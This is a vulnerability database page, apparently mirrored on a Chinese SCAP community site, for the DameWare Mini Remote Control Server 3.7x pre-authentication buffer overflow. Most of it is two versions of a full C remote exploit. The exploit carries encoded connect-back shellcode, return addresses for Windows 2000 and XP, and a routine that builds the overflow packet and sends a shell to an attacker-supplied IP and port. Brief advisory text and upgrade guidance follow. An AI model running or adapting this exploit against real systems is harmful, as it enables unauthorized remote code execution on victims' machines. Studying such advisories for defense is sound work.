// jmp esp @ 0x717564B8 | Win2k fr adv srv sp2 & Win2k en srv sp3 & Win2k en adv srv sp4 & win2k fr pro sp3
// jmp esp @ 0x7751A3AB | Win2k fr adv srv sp2 Win2k fr adv srv sp3 & Win2k fr pro sp3

/*
#define RET_WIN2K_SP0 0x717564B8
#define RET_WIN2K_SP1 0x717564B8
#define RET_WIN2K_SP2 0x717564B8
#define RET_WIN2K_SP3 0x717564B8
#define RET_WIN2K_SP4 0x717564B8
#define RET_WINXP_SP0 0x7776FE1F
#define RET_WINXP_SP1 0x7776FE1F
*/

#define RET    "\xB8\x64\x75\x71"
#define RET_XP "\x07\xD5\x36\x77"
// or #define RET_XP "\xC1\x1C\x35\x77" // this offset has been reported by many people

#define PORT 6129
#define SIZEOF 4096
#define WINUSER "h4x0r"
#define WINHOST "l33t_home"
#define USERPROFILE_NAME "script kiddie"
#define USERPROFILE_COMPANY "g33k solutions."
#define USERPROFILE_LICENSE "11111-OEM-0001111-11111"
#define USERPROFILE_DATE "12/24/03 00:00:00"
#define INTERFACE_IP "192.168.1.1,192.168.1.2"
#define WINDOMAIN "l33t_d0m41n"
#define CLIENT_VERSION "3.72.0.0"

/*
void print_packet(char *buffer, int begin, int end)
{
        int i,j;
        char ascii[9];

        for(i=begin,j=0;i<end;i++,j++) {
                if(i%10==0) {
                        printf("\r\n%04d: ",i);
                        j=0;
                memset(ascii,0,sizeof(ascii));
                }
        printf("0x%02x ",(unsigned char)buffer[i]);
        if(i%10==9) {
                ascii[10]=0x00;
                printf("%s",ascii);
                }
        if(!isprint(buffer[i]))
                ascii[j]='.';
        else
                ascii[j]=buffer[i];
        }
        printf("%s\r\n",ascii);
        return;
}
*/

int cnx(char *host)
{
        int sock;
        struct sockaddr_in yeah;
        struct hostent *she;

        sock=socket(AF_INET,SOCK_STREAM,0);
        if(!sock) {
                printf("error: unable to create socket\r\n");
                return 0;
                }
        yeah.sin_family=AF_INET;
        yeah.sin_addr.s_addr=inet_addr(host);
        yeah.sin_port=htons(PORT);

if((she=gethostbyname(host))!=NULL) {
        memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length);
        } else {
        if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
                printf("error: cannot resolve host\r\n");
                return 0;
                }
        }
        printf("[+] Connecting to %-30s ...",host);
        if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
                printf("error: connection refused\r\n");
                return 0;
                }
        printf("Done\r\n");
        return sock;
}

void set_sc(int os, int sp, char *rhost, int rport, char *shellc0de)
{
        unsigned int ip=0;
        unsigned short port=0;
        char *port_to_shell="",*ip1="";

        ip = inet_addr(rhost); ip1 = (char*)&ip;
        shellc0de[325]=ip1[0]^0x95;shellc0de[326]=ip1[1]^0x95;
        shellc0de[327]=ip1[2]^0x95; shellc0de[328]=ip1[3]^0x95;

        port = htons(rport);
        port_to_shell = (char *) &port;
        shellc0de[319]=port_to_shell[0]^0x95;
        shellc0de[320]=port_to_shell[1]^0x95;

switch(os)
{
case 0: // win2k
/*
        switch(sp)
        {
        case 0:
                *(long*)&shellc0de[0]=RET_WIN2K_SP0;
                break;
        case 1:
                *(long*)&shellc0de[0]=RET_WIN2K_SP1;
                break;
        case 2:
                *(long*)&shellc0de[0]=RET_WIN2K_SP2;
                break;
        case 3:
                *(long*)&shellc0de[0]=RET_WIN2K_SP3;
                break;
        case 4:
                *(long*)&shellc0de[0]=RET_WIN2K_SP4;
                break;
        }
*/
        break;
case 1: // winXP
        shellc0de[167]=shellc0de[215]=(unsigned char)0xfe;
        shellc0de[345]=shellc0de[453]=(unsigned char)0xfe;
/*
        switch(sp)
        {
        case 0:
                *(long*)&shellc0de[0]=RET_WINXP_SP0;
                break;
        case 1:
                *(long*)&shellc0de[0]=RET_WINXP_SP1;
                break;
        }
*/
        break;
        }
        return;
}

int start_auth(int sock, char *rhost, int rport)
{
        int size,i=4,os,sp;
        char buffer[SIZEOF];
        char shellc0de[] =
        "\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\xec\x50\xe8\xef"
        "\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xba\x01\x80\x33\x95"
        "\x43\xe2\xfa\x7e\xfa\xa6\x4e\x26\xa5\xf1\x1e\x96\x1e\xd5\x99\x1e"
        "\xdd\x99\x1e\x54\x1e\xc9\xb1\x9d\x1e\xe5\xa5\x96\xe1\xb1\x91\xad"
        "\x8b\xe0\xdd\x1e\xd5\x8d\x1e\xcd\xa9\x96\x4d\x1e\xce\xed\x96\x4d"
        "\x1e\xe6\x89\x96\x65\xc3\x1e\xe6\xb1\x96\x65\xc3\x1e\xc6\xb5\x96"
        "\x45\x1e\xce\x8d\xde\x1e\xa1\x0f\x96\x65\x96\xe1\xb1\x81\x1e\xa3"
        "\xae\xe1\xb1\x8d\xe1\x93\xde\xb6\x4e\xe0\x7f\x56\xca\xa6\x5c\xf3"
        "\x1e\x99\xca\xca\x1e\xa9\x1a\x18\x91\x92\x56\x1e\x8d\x1e\x56\xae"
        "\x54\xe0\x34\x56\x16\x79\xd5\x1e\x79\x14\x79\xb5\x97\x95\x95\xfd"
        "\xec\xd0\xed\xd4\xff\x9f\xff\xde\xff\x95\x7d\xe3\x6a\x6a\x6a\xa6"
        "\x5c\x52\xd0\x69\xe2\xe6\xa7\xca\xf3\x52\xd0\x95\xa6\xa7\x1d\xd8"
        "\x97\x1e\x48\xf3\x16\x7e\x91\xc4\xc4\xc6\x6a\x45\x1c\xd0\x91\xfd"
        "\xe7\xf0\xe6\xe6\xff\x9f\xff\xde\xff\x95\x7d\xd3\x6a\x6a\x6a\x1e"
        "\xc8\x91\x1c\xc8\x12\x1c\xd0\x02\x52\xd0\x69\xc2\xc6\xd4\xc6\x52"
        "\xd0\x95\xfa\xf6\xfe\xf0\x52\xd0\x91\xe1\xd4\x95\x95\x1e\x58\xf3"
        "\x16\x7c\x91\xc4\xc6\x6a\x45\xa6\x4e\xc6\xc6\xc6\xc6\xff\x94\xff"
        "\x97\x6a\x45\x1c\xd0\x31\x52\xd0\x69\xf6\xfa\xfb\xfb\x52\xd0\x95"
        "\xf0\xf6\xe1\x95\x1e\x58\xf3\x16\x7c\x91\xc4\x6a\xe0\x12\x6a\xc0"
        "\x02\xa6\x4e\x26\x97\x1e\x40\xf3\x1c\x8f\x96\x46\xf3\x52\x97\x97"
        "\x0f\x96\x46\x52\x97\x55\x3d\x94\x94\xff\x85\xc0\x6a\xe0\x31\x6a"
        "\x45\xfd\xf0\xe6\xe6\xd4\xff\x9f\xff\xde\xff\x95\x7d\x51\x6b\x6a"
        "\x6a\xa6\x4e\x52\xd0\x39\xd1\x95\x95\x95\x1c\xc8\x25\x1c\xc8\x2d"
        "\x1c\xc8\x21\x1c\xc8\x29\x1c\xc8\x55\x1c\xc8\x51\x1c\xc8\x5d\x52"
        "\xd0\x4d\x94\x94\x95\x95\x1c\xc8\x49\x1c\xc8\x75\x1e\xd8\x31\x1c"
        "\xd8\x71\x1c\xd8\x7d\x1c\xd8\x79\x18\xd8\x65\xc4\x18\xd8\x39\xc4"
        "\xc6\xc6\xc6\xff\x94\xc6\xc6\xf3\x52\xd0\x69\xf6\xf8\xf3\x52\xd0"
        "\x6b\xf1\x95\x1d\xc8\x6a\x18\xc0\x69\xc7\xc6\x6a\x45\xfd\xed\xfc"
        "\xe1\xc1\xff\x94\xff\xde\xff\x95\x7d\xcd\x6b\x6a\x6a\x6a";

        size=recv(sock,buffer,SIZEOF,0);
        if(buffer[0]!=0x30||buffer[1]!=0x11) {
                printf("error: wrong data received\r\n");
                return -1;
                }
        buffer[28]=0x00;buffer[36]=0x01;
        send(sock,buffer,size,0);
        memset(buffer,0,SIZEOF);
        printf("[+] Gathering %-30s     ...","information");
        for(size=0;size<4096;size+=recv(sock,&buffer[size],SIZEOF,0));

        if(buffer[0]!=0x10||buffer[1]!=0x27) {
                printf("error: wrong data received\r\n");
                return -1;
        }
        printf("Done\r\n");
        sp=(unsigned int)buffer[37];
        printf("[i] Operating system : ");
        if(buffer[16]==0x28||buffer[17]==0x0a) {
        os=1;
        printf("WinXP");
        } else {
                printf("Win2000");
                os=0;
        }
        printf("\r\n[i] Service Pack     : %s\r\n",&buffer[37]);
        printf("[+] Setting shellc0de for this %-15s   ...","version");
        set_sc(os,sp,rhost,rport,shellc0de);

        memset(&buffer[2],0,SIZEOF-2);
        strcpy(&buffer[175],WINUSER);
        memset(&buffer[416],0x90,180);
if(os==0)
        memcpy(&buffer[516],RET,4);
else
        memcpy(&buffer[516],RET_XP,4);
        memcpy(&buffer[520],shellc0de,sizeof(shellc0de));
        strcpy(&buffer[1200],WINHOST);strcpy(&buffer[975],USERPROFILE_NAME);
        strcpy(&buffer[1295],USERPROFILE_COMPANY);strcpy(&buffer[1495],USERPROFILE_LICENSE);
        strcpy(&buffer[1755],USERPROFILE_DATE);strcpy(&buffer[2015],WINHOST);
        strcpy(&buffer[2275],INTERFACE_IP);strcpy(&buffer[2535],WINDOMAIN);
        strcpy(&buffer[2795],CLIENT_VERSION);
        printf("Done\r\n");
        printf("[+] Sending evil %-30s  ...","packet");
        send(sock,buffer,SIZEOF,0);
        memset(buffer,0,SIZEOF);
        size=recv(sock,buffer,SIZEOF,0);

        if(buffer[0]!=0x32||buffer[1]!=0x11) {
                printf("Patched\r\n");
                return -1;
        }
        printf("Done\r\n");
        printf("[i] Shell should be arrived at %s:%d\r\n",rhost,rport);
        return 0;
}

void banner(void)
{
        printf("\r\n      [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt]\r\n");
        printf("\t\t  www.coromputer.net && undernet #coromputer\r\n\r\n");
        return;
}

int main(int argc, char *argv[])
{
        WSADATA wsaData;
        int sock;

        banner();
        if(argc!=4) {
                printf("syntax: %s <host> <your_ip> <your_port>\r\n",argv[0]);
                return -1;
        }
if(WSAStartup(0x0101,&wsaData)!=0) {
        printf("error: unable to load winsock\r\n");
        return -1;
        }
        sock=cnx(argv[1]);
if(!sock)
        return -1;
        start_auth(sock,argv[2],atoi(argv[3]));
        return 0;
}

		

- 漏洞信息 (23437)

DameWare Mini Remote Control Server 3.7x Pre-Authentication Buffer Overflow Vulnerability (3) (EDBID:23437)
windows remote
2003-12-16 Verified
0 kralor
N/A [点击下载]
source: http://www.securityfocus.com/bid/9213/info
  
A problem has been identified in the handling of pre-authentication packets by DameWare Mini Remote Control Server. Because of this, it may be possible for a remote attacker to gain unauthorized access to hosts using the vulnerable software.

/**************************************************************************************/
/*     [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt]    */
/* -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -  */
/* 8/10 win2k successfully exploited in blind mode (lang & type [pro,srv,etc] unknown)*/
/* tested against dameware versions: v3.68  v3.72                                     */
/* In comments there's some information about offsets for jmp esp on diff OS.         */
/* I've fixed a problem in the shellc0de, when I check for kernel32.dll, on winXP it  */
/* is kernel32.dll, but on win2k it is KERNEL32.DLL (both in unicode format)          */
/* shellc0de is a bit long for this b0f, so ExitThread won't be called, but it is in  */
/* the shellcode.Some people reported me 3 different offsets for winXP pro, home, sp0 */
/* or sp1, so I don't know why it's different and I haven't XP at home I can't find   */
/* another better EIP for XP (hope this 3 offsets will be enough for XP).             */
/* greetz: MrNice,AnAc,TripaX & Decryptus for helping me to find the EIP values.      */
/*....................................................................................*/
/* informations: kralor[at]coromputer.net,www.coromputer.net,irc undernet #coromputer */
/**************************************************************************************/

#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#pragma comment (lib,"ws2_32")

/*
0x717564B8   jmp esp in comctl32.dll
win2k fr adv srv sp2
win2k en adv srv sp3
win2k en adv srv sp4
win2k en srv     sp3
win2k fr pro     sp3
win2k en pro     sp4
*/

#define RET_XP_VAR0 "\x07\xD5\x36\x77"
#define RET_XP_VAR1 "\xC1\x1C\x35\x77" // these offsets has been reported by many people
#define RET_XP_VAR2 "\xC1\x1C\x39\x77"
#define RET_WIN2k   "\xB8\x64\x75\x71"

#define PORT 6129
#define SIZEOF 4096
#define WINUSER "h4x0r"
#define WINHOST "l33t_home"
#define USERPROFILE_NAME "script kiddie"
#define USERPROFILE_COMPANY "g33k solutions."
#define USERPROFILE_LICENSE "11111-OEM-0001111-11111"
#define USERPROFILE_DATE "12/24/03 00:00:00"
#define INTERFACE_IP "192.168.1.1,192.168.1.2"
#define WINDOMAIN "l33t_d0m41n"
#define CLIENT_VERSION "3.72.0.0"

int cnx(char *host)
{
	int sock;
	struct sockaddr_in yeah;
	struct hostent *she;

	sock=socket(AF_INET,SOCK_STREAM,0);
	if(!sock) {
		printf("error: unable to create socket\r\n");
		return 0;
		}
	yeah.sin_family=AF_INET; 
	yeah.sin_addr.s_addr=inet_addr(host); 
	yeah.sin_port=htons(PORT);

if((she=gethostbyname(host))!=NULL) { 
	memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length); 
	} else { 
	if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
		printf("error: cannot resolve host\r\n");
		return 0;
		} 
	}
	printf("[+] Connecting to %-30s ...",host);
	if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
		printf("error: connection refused\r\n");
		return 0;
		}
	printf("Done\r\n");
	return sock;
}

void set_sc(int os, char *rhost, int rport, char *shellc0de)
{
	unsigned int ip=0;
	unsigned short port=0;
	char *port_to_shell="",*ip1="";

	ip = inet_addr(rhost); ip1 = (char*)&ip;
	shellc0de[325]=ip1[0]^0x95;shellc0de[326]=ip1[1]^0x95;
	shellc0de[327]=ip1[2]^0x95; shellc0de[328]=ip1[3]^0x95;

	port = htons(rport);
	port_to_shell = (char *) &port;
	shellc0de[319]=port_to_shell[0]^0x95;
	shellc0de[320]=port_to_shell[1]^0x95;

	if(os==1) {
		shellc0de[167]=shellc0de[215]=(unsigned char)0xfe;
		shellc0de[345]=shellc0de[453]=(unsigned char)0xfe;
		}
	return;
}

int start_auth(int sock, char *rhost, int rport, int var)
{
	int size,i=4,os;
	char buffer[SIZEOF];
	char shellc0de[] =
        "\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\xec\x50\xe8\xef"
        "\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xba\x01\x80\x33\x95"
        "\x43\xe2\xfa\x7e\xfa\xa6\x4e\x26\xa5\xf1\x1e\x96\x1e\xd5\x99\x1e"
        "\xdd\x99\x1e\x54\x1e\xc9\xb1\x9d\x1e\xe5\xa5\x96\xe1\xb1\x91\xad"
        "\x8b\xe0\xdd\x1e\xd5\x8d\x1e\xcd\xa9\x96\x4d\x1e\xce\xed\x96\x4d"
        "\x1e\xe6\x89\x96\x65\xc3\x1e\xe6\xb1\x96\x65\xc3\x1e\xc6\xb5\x96"
        "\x45\x1e\xce\x8d\xde\x1e\xa1\x0f\x96\x65\x96\xe1\xb1\x81\x1e\xa3"
        "\xae\xe1\xb1\x8d\xe1\x93\xde\xb6\x4e\xe0\x7f\x56\xca\xa6\x5c\xf3"
        "\x1e\x99\xca\xca\x1e\xa9\x1a\x18\x91\x92\x56\x1e\x8d\x1e\x56\xae"
        "\x54\xe0\x34\x56\x16\x79\xd5\x1e\x79\x14\x79\xb5\x97\x95\x95\xfd"
        "\xec\xd0\xed\xd4\xff\x9f\xff\xde\xff\x95\x7d\xe3\x6a\x6a\x6a\xa6"
        "\x5c\x52\xd0\x69\xe2\xe6\xa7\xca\xf3\x52\xd0\x95\xa6\xa7\x1d\xd8"
        "\x97\x1e\x48\xf3\x16\x7e\x91\xc4\xc4\xc6\x6a\x45\x1c\xd0\x91\xfd"
        "\xe7\xf0\xe6\xe6\xff\x9f\xff\xde\xff\x95\x7d\xd3\x6a\x6a\x6a\x1e"
        "\xc8\x91\x1c\xc8\x12\x1c\xd0\x02\x52\xd0\x69\xc2\xc6\xd4\xc6\x52"
        "\xd0\x95\xfa\xf6\xfe\xf0\x52\xd0\x91\xe1\xd4\x95\x95\x1e\x58\xf3"
        "\x16\x7c\x91\xc4\xc6\x6a\x45\xa6\x4e\xc6\xc6\xc6\xc6\xff\x94\xff"
        "\x97\x6a\x45\x1c\xd0\x31\x52\xd0\x69\xf6\xfa\xfb\xfb\x52\xd0\x95"
        "\xf0\xf6\xe1\x95\x1e\x58\xf3\x16\x7c\x91\xc4\x6a\xe0\x12\x6a\xc0"
        "\x02\xa6\x4e\x26\x97\x1e\x40\xf3\x1c\x8f\x96\x46\xf3\x52\x97\x97"
        "\x0f\x96\x46\x52\x97\x55\x3d\x94\x94\xff\x85\xc0\x6a\xe0\x31\x6a"
        "\x45\xfd\xf0\xe6\xe6\xd4\xff\x9f\xff\xde\xff\x95\x7d\x51\x6b\x6a"
        "\x6a\xa6\x4e\x52\xd0\x39\xd1\x95\x95\x95\x1c\xc8\x25\x1c\xc8\x2d"
        "\x1c\xc8\x21\x1c\xc8\x29\x1c\xc8\x55\x1c\xc8\x51\x1c\xc8\x5d\x52"
        "\xd0\x4d\x94\x94\x95\x95\x1c\xc8\x49\x1c\xc8\x75\x1e\xd8\x31\x1c"
        "\xd8\x71\x1c\xd8\x7d\x1c\xd8\x79\x18\xd8\x65\xc4\x18\xd8\x39\xc4"
        "\xc6\xc6\xc6\xff\x94\xc6\xc6\xf3\x52\xd0\x69\xf6\xf8\xf3\x52\xd0"
        "\x6b\xf1\x95\x1d\xc8\x6a\x18\xc0\x69\xc7\xc6\x6a\x45\xfd\xed\xfc"
        "\xe1\xc1\xff\x94\xff\xde\xff\x95\x7d\xcd\x6b\x6a\x6a\x6a";

	size=recv(sock,buffer,SIZEOF,0);
	if(buffer[0]!=0x30||buffer[1]!=0x11) {
		printf("error: wrong data received\r\n");
		return -1;
		}
	buffer[28]=0x00;buffer[36]=0x01;
	send(sock,buffer,size,0);
	memset(buffer,0,SIZEOF);
	printf("[+] Gathering %-30s     ...","information");
	for(size=0;size<4096;size+=recv(sock,&buffer[size],SIZEOF,0));

	if(buffer[0]!=0x10||buffer[1]!=0x27) {
		printf("error: wrong data received\r\n");
		return -1;
	}
	printf("Done\r\n");
	printf("[i] Operating system : ");
	if(buffer[16]==0x28||buffer[17]==0x0a) {
	os=1;
	printf("WinXP");
	} else {
		printf("Win2000");
		os=0;
	}
	printf("\r\n[i] Service Pack     : %s\r\n",!buffer[37]?"0":&buffer[37]);
	printf("[+] Setting shellc0de for this %-15s   ...","version");
	set_sc(os,rhost,rport,shellc0de);
	
	memset(&buffer[2],0,SIZEOF-2);
	strcpy(&buffer[175],WINUSER);
	memset(&buffer[416],0x90,180);
	printf("Done\r\n");
if(os==0)
	memcpy(&buffer[516],RET_WIN2k,4);
else {
	if(var==0) {
	printf("[!] Using 0x7736d507 as ret addr\r\n");
	memcpy(&buffer[516],RET_XP_VAR0,4);
	} else {
		if(var==1) {
	memcpy(&buffer[516],RET_XP_VAR1,4);
	printf("[!] Using 0x77351cc1 as ret addr\r\n");
		} else {
	memcpy(&buffer[516],RET_XP_VAR2,4);
	printf("[!] Using 0x77391cc1 as ret addr\r\n");
		}
	}
}
	memcpy(&buffer[520],shellc0de,sizeof(shellc0de));
	strcpy(&buffer[1200],WINHOST);strcpy(&buffer[975],USERPROFILE_NAME);
	strcpy(&buffer[1295],USERPROFILE_COMPANY);strcpy(&buffer[1495],USERPROFILE_LICENSE);
	strcpy(&buffer[1755],USERPROFILE_DATE);strcpy(&buffer[2015],WINHOST);
	strcpy(&buffer[2275],INTERFACE_IP);strcpy(&buffer[2535],WINDOMAIN);
	strcpy(&buffer[2795],CLIENT_VERSION);

	printf("[+] Sending evil %-30s  ...","packet");
	send(sock,buffer,SIZEOF,0);
	memset(buffer,0,SIZEOF);
	size=recv(sock,buffer,SIZEOF,0);

	if(buffer[0]!=0x32||buffer[1]!=0x11) {
		printf("Patched\r\n");
		return -1;
	}
	printf("Done\r\n");
	printf("[i] Shell should be arrived at %s:%d\r\n",rhost,rport);
	return 0;
}

void banner(void)
{
	printf("\r\n  [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt]\r\n");
	printf("\t\t  www.coromputer.net && undernet #coromputer\r\n\r\n");
	return;
}
void syntax(char *prog)
{
	printf("syntax: %s <host> <your_ip> <your_port> [winXP variant]\r\n",prog);
	printf("winXP variante:\r\n");
	printf("               0 will use 0x7736d507 as eip [found on many XPs][default]\r\n");
	printf("               1 will use 0x77351cc1 as eip [found on many XPs]\r\n");
	printf("               2 will use 0x77391cc1 as eip [found on one XP sp0]\r\n");
	return;
}
int main(int argc, char *argv[])
{
	WSADATA wsaData;
	int sock,var=0;

	banner();
	if(argc<4||argc>5) {
		syntax(argv[0]);
		return -1;
		}
if(argc==5) {
	var=atoi(argv[4]);
	if(var>2||var<0) {
		syntax(argv[0]);
		return -1;
		}
	}
if(WSAStartup(0x0101,&wsaData)!=0) {
	printf("error: unable to load winsock\r\n");
	return -1;
	}
	sock=cnx(argv[1]);
if(!sock)
	return -1;
	start_auth(sock,argv[2],atoi(argv[3]),var);
	return 0;
}
		

- 漏洞信息

3042
DameWare Mini Remote Control Pre-authentication Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A local overflow exists in DameWare V3.70, 3.72 and possibly earlier. The Buffer Overflow is caused by lack of bounds checking during authentication. A remote attacker could send a spoofed communication packet to the vulnerable server listening on TCP port 6129 to overflow a buffer and execute arbitrary code on the server.

- 时间线

2003-12-16 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 3.73.0.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

DameWare Mini Remote Control Server Pre-Authentication Buffer Overflow Vulnerability
Boundary Condition Error 9213
Yes No
2003-12-15 12:00:00 2009-07-12 12:56:00
Vulnerability discovery credited to wirepair.

- 受影响的程序版本

DameWare Development Mini Remote Control Server 3.72 .0.0
DameWare Development Mini Remote Control Server 3.71 .0.0
DameWare Development Mini Remote Control Server 3.70 .0.0
DameWare Development Mini Remote Control Server 4.0
DameWare Development Mini Remote Control Server 3.73 .0.0

- 不受影响的程序版本

DameWare Development Mini Remote Control Server 4.0
DameWare Development Mini Remote Control Server 3.73 .0.0

- 漏洞讨论

A problem has been identified in the handling of pre-authentication packets by DameWare Mini Remote Control Server. Because of this, it may be possible for a remote attacker to gain unauthorized access to hosts using the vulnerable software.

- 漏洞利用

Exploit contributed by Adik, additional exploit contributed by kralor.

- 解决方案

This issue has been resolved in version 3.73 and later (including version 4.0). Users should contact the vendor to obtain upgrades.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站